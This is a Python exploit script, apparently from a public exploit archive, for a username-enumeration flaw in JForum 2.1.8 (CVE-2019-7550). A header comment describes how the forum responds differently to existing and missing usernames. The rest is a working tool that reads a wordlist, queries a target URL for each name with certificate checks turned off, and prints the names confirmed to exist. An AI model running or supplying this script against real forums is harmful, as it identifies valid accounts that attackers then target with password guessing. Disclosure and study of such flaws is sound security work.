#!/usr/bin/env python
# 
# Exploit Title: Username Enumeration in JForum 2.1.8
# Date: 2019-02-07
# Exploit Author: Moez Janmohammad of Critical Start Section 8
# CVE: CVE-2019-7550
# 
# In JForum, username emumeration is possible using an exposed function.
# If a username exists, JForum will return the username in the HTTP response
# </a><!-- == CMS MainContent (BEGIN) == --><div class="MainContent">The name webadmin is already in use, please choose something else</div><!-- == CMS MainContent (END) == --></div>
# 
# If the username doesn't exist, it will return "0"
# </a><!-- == CMS MainContent (BEGIN) == --><div class="MainContent">0</div><!-- == CMS MainContent (END) == --></div>
# 


import argparse
import requests

parser = argparse.ArgumentParser(description="Enumerate usernames in JForum 2.1.x")
parser.add_argument('target', metavar='<target>', type=str, nargs=1, help='The URL of the target process')
parser.add_argument('ufile', metavar='<file>', type=str, nargs=1, help='The path to the file containing usernames to test')
args = parser.parse_args()

#disables SSL warnings for websites with untrusted certificates
requests.packages.urllib3.disable_warnings()

#opens the username file and reads the names into a file.
f=open(args.ufile[0], 'r')
usernames = f.readlines()
f.close()

#iterates through usernames list, adds url before username, checks if username exists
for i in range(0,len(usernames)):
    url = args.target[0].strip() + usernames[i].strip()
    # disables SSL verification in case the cert is untrusted
    resp = requests.get(url, verify=False)
    # uses the find() library to check if username is inside response.
    if resp.text.find(usernames[i].strip()) != -1:
        # print username out.
        print(usernames[i].strip())
